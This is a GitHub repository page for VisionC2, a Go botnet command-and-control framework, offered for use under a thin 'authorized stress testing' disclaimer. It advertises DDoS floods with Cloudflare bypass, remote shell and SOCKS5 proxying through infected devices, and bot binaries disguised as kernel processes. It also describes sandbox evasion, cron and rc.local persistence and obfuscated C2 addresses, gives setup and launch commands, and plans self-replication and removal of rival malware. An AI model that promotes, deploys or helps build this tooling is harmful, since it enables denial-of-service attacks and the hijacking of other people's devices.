Skip to content

VisionC2 is a Go Based Botnet Framework with HMAC + TLS 1.3 Encryption, 10+ Attacks (L4/L7), Remote Command Execution, and Reverse SOCK5

License

Notifications You must be signed in to change notification settings

Syn2Much/VisionC2

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

153 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

VisionC2 – Advanced Botnet Command & Control Framework

VisionC2 Go Platform License

VisionC2 is a Go-based botnet with a TUI CNC for network stress testing, featuring TLS 1.3 encryption, 14+ architecture support, remote shell, SOCKS5 proxying, and sophisticated attack methods.


πŸ“‘ Table of Contents

This Document

Documentation

Document Description
USAGE.md Full setup guide, deployment, and TUI usage
COMMANDS.md Complete command reference for attacks & shell
CHANGELOG.md Version history and release notes

TLS Bypass vs one of the largest DSTAT Graphs (6 servers)

Demo Animation


πŸš€ Quick Start

Prerequisites

sudo apt update && sudo apt install -y upx-ucl openssl git wget gcc python3 screen
# Go 1.23+ required β†’ https://go.dev/dl/

Installation

git clone https://github.com/Syn2Much/VisionC2.git
cd VisionC2
python3 setup.py

βš™οΈ Configuration

After running the setup wizard, code changes will be made automatically. However, review setup_config.txt for:

  • C2 address & ports
  • Magic code & encryption keys
  • Generated 4096-bit certificates

Starting the C2

TUI Mode (recommended):

cd cnc
./cnc

Split Mode (telnet/multi-user):

./cnc --split
# Then connect: nc <server-ip> <admin-port>
# Login trigger: spamtec

Bot binaries are automatically built to bot/bins/.

Binary Naming – Binaries are disguised as kernel/system processes to evade Mirai/Qbot killers and blend with legitimate processes:

Binary Architecture Description
kworkerd0 x86 (386) 32-bit Intel/AMD
ethd0 x86_64 64-bit Intel/AMD
mdsync1 ARMv7 Raspberry Pi 2/3
ip6addrd ARM64 Raspberry Pi 4, Android
... +10 more MIPS, PPC64, RISC-V, s390x

See bot/build.sh or USAGE.md for full 14-architecture mapping.


✨ Features

πŸ€– Bot Capabilities

  • Layer 4: UDP, TCP, SYN, ACK, GRE, DNS flood methods
  • Layer 7: HTTP / HTTPS / TLS with HTTP/2 fingerprinting and Cloudflare UAM bypass (including CAPTCHA solving)
  • Remote Execution: Interactive and fire-and-forget shell commands
  • SOCKS5 Proxy: Turn any agent into a SOCKS5 proxy server

πŸ›‘οΈ Security & Stealth

  • TLS 1.3 with perfect forward secrecy
  • Multi-layer obfuscation (RC4, XOR, byte substitution, MD5)
  • HMAC challenge-response authentication
  • Anti-analysis & sandbox detection

πŸ–₯️ TUI Features

  • Real-time bot management, visual attack builder, live shell access, and targeting filters
  • Single Agent Targeting: Interactive management menu for each bot (terminal-like shell on specific bot)
  • Built-in SOCKS5 Proxy Manager (one-click per bot): Easily manage new or existing proxies
  • Broadcast Shell Execution with architecture, RAM, and bot count filtering

⚑ Performance

  • 2 Servers = 30k–40k Requests Per Second
  • Layer 4 Throughput(2 servers): 2–6 Gbps

    Note: Performance is dependent on your bots’ hardware and network.

  • 14+ architecture support (automated cross-compilation)
  • Fully automated 5-minute setup

πŸ—οΈ Architecture

Admin Console ──TLS 1.3──► C2 Server ◄──TLS 1.3── Bot Agents (14+ arches)

Bot Startup Flow

START β†’ Sandbox Check ─[detected]─► EXIT(200)
          β”‚
          β–Ό
    Persistence (rc.local + cron)
          β”‚
          β–Ό
    C2 Resolution: Decrypt URL β†’ DoH TXT β†’ DNS TXT β†’ A Record β†’ Direct IP
          β”‚
          β–Ό
    TLS Connect β†’ HMAC Auth β†’ Command Loop ◄─── Reconnect on Disconnect

HMAC Challenge-Response

BOT                                    C2 SERVER
 β”‚ ──── TLS Handshake ───────────────► β”‚
 β”‚ ◄─── AUTH_CHALLENGE:<random_32> ─── β”‚  Unique challenge
 β”‚      Hash: Base64(MD5(challenge + MAGIC + challenge))
 β”‚ ──── AUTH_RESPONSE:<hash> ────────► β”‚  Server verifies
 β”‚ ◄─── AUTH_SUCCESS ────────────────► β”‚  
 β”‚ ──── ARCH|RAM|VERSION ────────────► β”‚  System info
 β”‚ ◄═══ Command Loop ════════════════► β”‚

Why? Prevents replay (unique challenge) β€’ No plaintext secrets β€’ Lightweight MD5 for embedded

C2 URL Decryption (4-Layer)

Base64 Blob β†’ Base64 Decode β†’ XOR (derived key) β†’ RC4 β†’ Byte Sub (ROL3, XOR 0xAA) β†’ MD5 verify
    β–Ό
"192.168.1.1:443"

Why Multi-Layer? Base64 hides binary β€’ XOR defeats static analysis β€’ RC4 encrypts β€’ MD5 detects tampering


πŸ—ΊοΈ Roadmap

In Progress

  • Enhanced daemonization & persistence
  • Locker/killer (remove competing malware)

Planned

  • Auto-generated DGA fallback domains
  • Self-replication / spreading
  • Single-instance port takeover

See CHANGELOG.md for detailed history.


⚠️ Disclaimer

FOR AUTHORIZED SECURITY RESEARCH AND STRESS TESTING ONLY

The authors are not responsible for any misuse, damage, or legal consequences arising from the use of this software. Use responsibly and legally.


πŸ“œ License

This project is licensed under the MIT License β€” see the LICENSE file for details.


🀝 Support


About

VisionC2 is a Go Based Botnet Framework with HMAC + TLS 1.3 Encryption, 10+ Attacks (L4/L7), Remote Command Execution, and Reverse SOCK5

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •